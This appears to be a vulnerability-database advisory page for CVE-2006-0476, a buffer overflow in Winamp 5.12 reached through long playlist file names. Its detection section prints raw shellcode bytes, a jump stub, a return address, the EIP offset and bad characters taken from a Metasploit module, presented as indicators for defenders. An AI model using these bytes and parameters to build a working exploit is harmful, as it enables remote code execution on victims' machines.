cbcvebase.
CVE-2006-0476
published 2006-01-31

CVE-2006-0476: Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).

PriorityP354high7.6CVSS 2.0
AVNACHAuNCCICAC
EXPLOIT
EPSS
74.51%
99.4th percentile
Buffer overflow in Nullsoft Winamp 5.12 allows remote attackers to execute arbitrary code via a playlist (pls) file with a long file name (File1 field).

Affected

18 ranges
VendorProductVersion rangeFixed in
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp
nullsoftwinamp

Detection & IOCsextracted from sources · hover to see the quote

other0x0d45fece
bytes
\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4
bytes
\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21\x61\xdd\x0e\x4d
bytes
\x87\xe1
  • Malicious .pls playlist file delivered via browser containing a UNC path (\\<long_computer_name>) in the File1= field with a computer name of ~1026 bytes, overwriting EIP at offset 1022.
  • Detect .pls playlist files where the File<N>= field begins with \\\\ (UNC path) and the computer name component exceeds 1022 bytes — indicative of buffer overflow exploitation.
  • Payload bad characters for this exploit are null byte, backslash, forward slash, CR, LF, and space (\x00\x5c\x2f\x0a\x0d\x20); encoded shellcode in .pls UNC field will avoid these bytes.
  • The exploit prepends \x87\xe1 (XCHG ECX,ESP) to the payload encoder to restore ESP from ECX after landing on the \x5c\x5c UNC prefix trashes ESP; presence of this two-byte sequence at the start of shellcode in a .pls file is a strong indicator.
  • The Metasploit module supports a PlaylistSpaceInjection evasion option that inserts random spaces/tabs around keys and values in the playlist; detect .pls files with abnormal whitespace around '=' delimiters.
  • The jump-to-shellcode sequence \x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4 appears at a fixed offset within the malicious .pls UNC computer name field; scan .pls file content for this byte pattern.
  • ·The Metasploit return address (0x0d45fece) is specific to Winamp 5.12 Universal only; the byte 0x0d is replaced by 0x00 during processing, which is an intentional exploit design detail.
  • ·The Metasploit module was only successfully tested against Winamp 5.11 and 5.12; the payload space is limited to 526 bytes.
  • ·NOP sleds are explicitly disabled in the Metasploit payload configuration to avoid modifying the ECX register, which is used for ESP restoration.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.